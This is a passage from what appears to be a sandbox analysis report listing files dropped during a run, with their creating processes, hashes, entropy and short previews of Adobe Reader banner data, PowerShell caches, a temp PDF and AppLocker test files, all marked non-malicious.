                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1395
                                                                                                        Entropy (8bit):5.77494819789981
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Yv6X5iomBRurLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJND:Yv7RYHgDv3W2aYQfgB5OUupHrQ9FJN
                                                                                                        MD5:EBB02620BFB766F63E87682D4D939F58
                                                                                                        SHA1:4F8C59FF6D7EBEF0A305496DDC155D9AE4189330
                                                                                                        SHA-256:5D92C0B677A02D25319392C4EC657A5ABC6DA7D5D758A7A4172EBBA0FAF71C1C
                                                                                                        SHA-512:321A050BB6FF08246147208EDD963A63C4FA886ADDB334D19B8F1234EEC650E75DF654B81C34A5657B2CD0768FA8F540C8CE4BE527D91900FCEA2C4956417C7A
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"c85e5333-9f07-401c-a214-a63a3d8c45c3","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1731235383856,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0

                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\Files\DC_Reader_RHP_Intent_Banner

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):291
                                                                                                        Entropy (8bit):5.261078734613812
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HX5KlIFIEsfRHhcgvEm0YcoAvJfbPtdPeUkwRe9:YvXKX5iaIEmBRLGDV8Ukee9
                                                                                                        MD5:1DE58DFCD102CA70C1B305F481C91AF3
                                                                                                        SHA1:E481ACF4DCFDF99F21ABD1155D932C60BE490C6F
                                                                                                        SHA-256:B4C0E27B7152051A5C84284F9D97E48DA0348530AD323D272B88516CCA5A140A
                                                                                                        SHA-512:D06C8073A46ABA16650A54E5A444651EBE59077A1D2374689043A8999D224893383C7C1B8F3AA94A0885F4263F68FD5EFC868631D8815F4E61DF1FAB7672A05B
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"c85e5333-9f07-401c-a214-a63a3d8c45c3","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1731235383856,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\Files\DC_Reader_RHP_Retention

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):287
                                                                                                        Entropy (8bit):5.253135760409525
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HX5KlIFIEsfRHhcgvEm0YcoAvJf21rPeUkwRe9:YvXKX5iaIEmBRLG+16Ukee9
                                                                                                        MD5:DDD80DD2968583CDAEB7F61CF36934E4
                                                                                                        SHA1:F0C6CBAF6E6F70BC753844D90702CF0968D916C1
                                                                                                        SHA-256:0E3E8654A4AE70541A58DE496164B2123A5CB54F494A1255422050F995D91C8A
                                                                                                        SHA-512:98E7B4D552707B0071E09619C84BEEC9A8F81F9E39573A18076B083097D3490D3988C5F6EC3B22BB6F9020F658F0C947E7406D8A40B1DDEF61E72BD0C59B2638
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"c85e5333-9f07-401c-a214-a63a3d8c45c3","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1731235383856,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\Files\DC_Reader_Sign_LHP_Banner

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1090
                                                                                                        Entropy (8bit):5.661759487515197
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Yv6X5iomBRkamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS6:Yv7RcBgkDMUJUAh8cvM6
                                                                                                        MD5:B1AC9FFBE189E216E781088820E778AF
                                                                                                        SHA1:0FD7CC2642B046E49E3FF226959E2A5A04E1C238
                                                                                                        SHA-256:3D8A9C465D4FF12DBE44B7369212737D410BC96D0AB882DF4EEAF63A81E11034
                                                                                                        SHA-512:29FDEAB43C2EC04F33FD6B11B80981D0B5B00989BBBFF9E269EC5B997954976A94E5DBE08F5AC27F1BE724F9EBDFC6C2A90F55716FAEEC1FFA1E546DE9BBFEB6
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"c85e5333-9f07-401c-a214-a63a3d8c45c3","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1731235383856,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\Files\DC_Reader_Upsell_Cards

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):286
                                                                                                        Entropy (8bit):5.228060709058579
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HX5KlIFIEsfRHhcgvEm0YcoAvJfshHHrPeUkwRe9:YvXKX5iaIEmBRLGUUUkee9
                                                                                                        MD5:0C380DF063E4716DE7B1AB70D24AA59F
                                                                                                        SHA1:FA9A2D5C9E609BD866FA36C9461848D49A8E54D1
                                                                                                        SHA-256:67AD5253FE149A78B68D27E9F65C70B6DE871681D5C824D57DCED4BF0FA1FE3E
                                                                                                        SHA-512:883D77141733F2C3575D21226809CDCC953B358864D8041BABC17F7950F18B7FCCE937A635EB5BFC1964152DD666EE0CC834E9FD7B3402171638D8FA87F5C17C
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"c85e5333-9f07-401c-a214-a63a3d8c45c3","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1731235383856,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\Files\Edit_InApp_Aug2020

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):782
                                                                                                        Entropy (8bit):5.358804072090425
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:YvXKX5iaIEmBRLGTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhW3:Yv6X5iomBRr168CgEXX5kcIfANh6
                                                                                                        MD5:A11E204EB5634886B314A9A580278592
                                                                                                        SHA1:10F47166F8A6DEFAB754CB073037CE08D185520D
                                                                                                        SHA-256:D282D6262ED4F8F54E4D2123F83D927E9FF2E354F6D1C6679D8D2FAC5650523C
                                                                                                        SHA-512:ECF489683CE1ED3191972C30715D9C9446E933E78A1EAA4D279E49E81ACD4C81F561DE3D232B58D3E079D78F5042E6F3EB5F8557E1B7065D6D838A726391D349
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"c85e5333-9f07-401c-a214-a63a3d8c45c3","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1731235383856,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1731060648886}}}}

                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\Files\TESTING

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4
                                                                                                        Entropy (8bit):0.8112781244591328
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:e:e
                                                                                                        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                        SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                        Malicious:false
                                                                                                        Preview:....

                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\SOPHIA.json

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2639
                                                                                                        Entropy (8bit):5.144260792217689
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:YCb/HzvGnaduayk0lOZwTX4xm7V+MC8Gyd4QtWFqeQwETYcj3Aj0SmSkINfx/2Yw:YCzTSBTXqEz3d4Q1P93S+WrPWpBBh9Ia
                                                                                                        MD5:5D79A048CBA3D88403676D074DF25E21
                                                                                                        SHA1:588733C1093BB2E184118AA683A6C4A99BC640C4
                                                                                                        SHA-256:AF830BA3549DFEC7FE45BAB2B67CCA7E72F49BADB3B2810865F066DDE8F51CA6
                                                                                                        SHA-512:82DB4DA1287D3B03C542A839656F97F8A5CF005F2E769A7AB6E8765C232884E1B72F6EEE919D755225D4CEDB2242BD96EA64987C428C4356F0C70E2FE400016E
                                                                                                        Malicious:false
                                                                                                        Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"28e7b4b5dcc85d9751713482da33ac42","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1122,"ts":1731060648000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"522f5cfcc3db6c5d72b116c26c27a262","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1731060648000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"f5ec8aa5a82559c979797ec16d313af9","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1731060648000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"5a932c5cdde726c78e9592afa3cdd8ea","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1102,"ts":1731060648000},{"id":"DC_Reader_RHP_Banner","info":{"dg":"589113cbcb87c976e9e049692b53891a","sid":"DC_Reader_RHP_Banner"},"mimeType":"file","size":1395,"ts":1731060648000},{"id":"Edit_InApp_Aug2020","info":{"dg":"e7dff2b57e120c2e4aa1a9f242546bb9","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":1731060648000},{"id":"DC

                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):40887
                                                                                                        Entropy (8bit):5.480223082781645
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:cmYmhi/rU/wJ8vG2sGjkDa2oOWNEm1x+sJYNg7y:7Ymhi/rU/wOvGL6kDa2oLfYyu
                                                                                                        MD5:55FB74F955D628F905389F13D239A592
                                                                                                        SHA1:5647612F3422B32C703B993475E21B36809C1682
                                                                                                        SHA-256:12A0981F5FB5129F6BAAD2AD42C89CF4A2C628D421A903547070E9194B380035
                                                                                                        SHA-512:4AB963B433E411669CB6706A4AC35E9E278B341904EAE3D442D0CFDF83CD61923A0228753E5131DD3DCBAA610AD9FF5D21295D900B9ED1D51CFCDDDDF523EFA3
                                                                                                        Malicious:false
                                                                                                        Preview:4.241.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2:o:..........:F:Arial-BoldItalicMT.P:Arial Bold Italic.L:$.........................."F:Arial.#.93.FID.2:o:..........:F:Arial-Black.P:Arial Black.L:-.........................."F:Arial Black.#.105.FID.2:o:..........:F:Bahnschrift.P:Bahnschrift Light.L:&...............,.........."F

                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):20010
                                                                                                        Entropy (8bit):5.02483968322263
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:KiQ0HzAFbFXX359ib4DVVHWrxpUUpXoCwiopbjvwRjdvRlYfWkib45OvQJvOjJx:KinHzwZH3FVVHWrxpUUpXoCwiopbjoRd
                                                                                                        MD5:07388C6CFA6BC904B45FA7E168B899FD
                                                                                                        SHA1:AAA45F87E01D4C0684789D16B887A984FDDBC506
                                                                                                        SHA-256:608907B69D3275653775ACFA2E4782294711F87979921D3E6557DEE6847F3035
                                                                                                        SHA-512:44CAD5B149165FEFB23572E09E15FF5C162E96220E20E0D84B02AD73B0080E863C387BFF93B7C98BE79C49870B37C8F0E701D6D02648B2A4CD61E544EE9F15E5
                                                                                                        Malicious:false
                                                                                                        Preview:PSMODULECACHE......wMk.z..K...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1........Clear-BitLockerAutoUnlock........Lock-BitLocker........Backup-BitLockerKeyProtector........Resume-BitLocker........Disable-BitLockerAutoUnlock....!...BackupToAAD-BitLockerKeyProtector........Add-BitLockerKeyProtector........Unlock-BitLocker........Enable-BitLockerAutoUnlock........Disable-BitLocker........Remove-BitLockerKeyProtector........Enable-BitLocker........Suspend-BitLocker........Get-BitLockerVolume........@.8o.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Get-Date........Clear-Variable........Get-EventSubscriber........Import-Csv........Get-Variable........New-Variable........Compare-Object........New-TemporaryFile........Convert-String........New-Alias........Export-Csv........Get-Event........Set-TraceSource........ConvertTo-Csv........ConvertFrom-Json........Get-PSCallStack........

                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1760
                                                                                                        Entropy (8bit):5.681223308954038
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:hSp4iiqAv4RYymFoUeO+g9qr9tK8N0+5nOA+u0DlINqzKjlzc:Ay3IYvKLY9qr2Kr5nOAlWlIpZw
                                                                                                        MD5:841E3DF146CAD521A5DE05B3906A5D7E
                                                                                                        SHA1:195FB0EB0A6FFCAD20F59FFB970AFACB87DD0D8B
                                                                                                        SHA-256:E42489FF83931889424356198BBFB76E36E1D28E03BE09F3159DBC04FCB393E2
                                                                                                        SHA-512:D615C06982F457BBD32EAD8124D5EF3B8903656A873ECD3E774D9DF4B4ADBE95D44010FF6F70E54961F05F9D620744FD6E7D6B5637FA8D71D3A3A19F4E01AB5A
                                                                                                        Malicious:false
                                                                                                        Preview:@...e...........R....................................@..........@................P....bG....zI..........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0..................)W_tD...B..T.........System..4...............-..Q...H..g............System.Core.D................g$H..K..I.............System.Management.Automation<.................YS.eE..9.G...........System.Management...@...............8Ak....G.......j........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4................x..:.9@.N4Jgf..........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                                                                                        C:\Users\user\AppData\Local\Temp\RESFF9A.tmp

                                                                                                        Download File
                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Fri Nov 8 10:10:30 2024, 1st section name ".debug$S"
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1336
                                                                                                        Entropy (8bit):3.994124595465284
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:H1m9h996ZrPHHwKGmNII+ycuZhNlakSzPNnqSSd:oWZrwKGmu1ulla35qSC
                                                                                                        MD5:37C599A7EB12438CAB33ECA9C6041DE6
                                                                                                        SHA1:28789CEE4C52A45045404500539380B445D4EA41
                                                                                                        SHA-256:8E06893012E6327E322B3AED8D3418C92C7336C7D227706888D6667EBE777E2E
                                                                                                        SHA-512:344FE969700BBED2370FFD1B5E52CA75EDF50904FF3C24FE2D73FDDAF4EA6E142CDCE8594ECF3F6BEDD2D2479479F539DE4608EE663AA19AD1E2A75EBEFC1845
                                                                                                        Malicious:false
                                                                                                        Preview:L.....-g.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\wr03xjs0\CSC787E510638EC4229B85DAEC3AD1CFCC9.TMP..................Lv.F.....>-B.............5.......C:\Users\user\AppData\Local\Temp\RESFF9A.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.r.0.3.x.j.s.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

                                                                                                        C:\Users\user\AppData\Local\Temp\SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:PDF document, version 1.5, 4 pages
                                                                                                        Category:dropped
                                                                                                        Size (bytes):137244
                                                                                                        Entropy (8bit):7.9463989977621825
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:99mMPAOkORGWf2QmVDkVo7N8LiMbWqyWWBtA0JikMLeHpn38V/cJZV:9gMPvmVDk+NnMSqyxZCLeHVMV/S
                                                                                                        MD5:E9AA904AE264299DA9DA51C96D1DB804
                                                                                                        SHA1:B2DEC099645CC33A51058565B9ACF413FDB310B9
                                                                                                        SHA-256:FE903967341821E392F6A85ECE547C11CAEC83B3BAAECB8A968CC90E9F0F7B26
                                                                                                        SHA-512:675649F5305717BEB06D587B1B1F71CB41D65640E0FD88D6846E92C22818FC6BC65A98CE4FE0DCE142EA620CDDEB1ECD4E9A144FF1EC061BA5BD370FFCA434A5
                                                                                                        Malicious:false
                                                                                                        Preview:%PDF-1.5.%.....1 0 obj.<<./Pages 2 0 R./Type /Catalog.>>.endobj.3 0 obj.<<./Producer (Skia/PDF m91)./rgid (PB:350074388_AS:1001673673687041@1615829022798).>>.endobj.2 0 obj.<<./Count 4./Kids [4 0 R 5 0 R 6 0 R 7 0 R]./Type /Pages.>>.endobj.4 0 obj.<<./Type /Page./Resources <<./ProcSet [/PDF /Text /ImageB /ImageC /ImageI]./ExtGState <<./G3 8 0 R./G8 9 0 R./G9 10 0 R.>>./XObject <<./X7 11 0 R.>>./Font <<./F4 12 0 R./F5 13 0 R./F6 14 0 R.>>.>>./MediaBox [0 0 595.91998 841.91998]./Annots [15 0 R 16 0 R 17 0 R 18 0 R 19 0 R 20 0 R 21 0 R]./Contents 22 0 R./StructParents 0./Parent 2 0 R.>>.endobj.5 0 obj.<<./Contents 23 0 R./MediaBox [0 0 596 843]./Parent 2 0 R./Resources <<./ExtGState <<./G3 24 0 R./G7 25 0 R.>>./Font <<./F4 26 0 R./F5 27 0 R./F6 28 0 R./F8 29 0 R.>>./ProcSet [/PDF /Text /ImageB /ImageC /ImageI].>>./StructParents 0./Type /Page.>>.endobj.6 0 obj.<<./Contents 30 0 R./MediaBox [0 0 596 843]./Parent 2 0 R./Resources <<./ExtGState <<./G3 24 0 R./G7 25 0 R.>>./Font <<./F4 26 0 R.

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_024zsxjc.mah.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1baxelln.sgw.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1vio1xmi.vgc.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4dkfcksi.gm2.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ozrer4z.00x.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
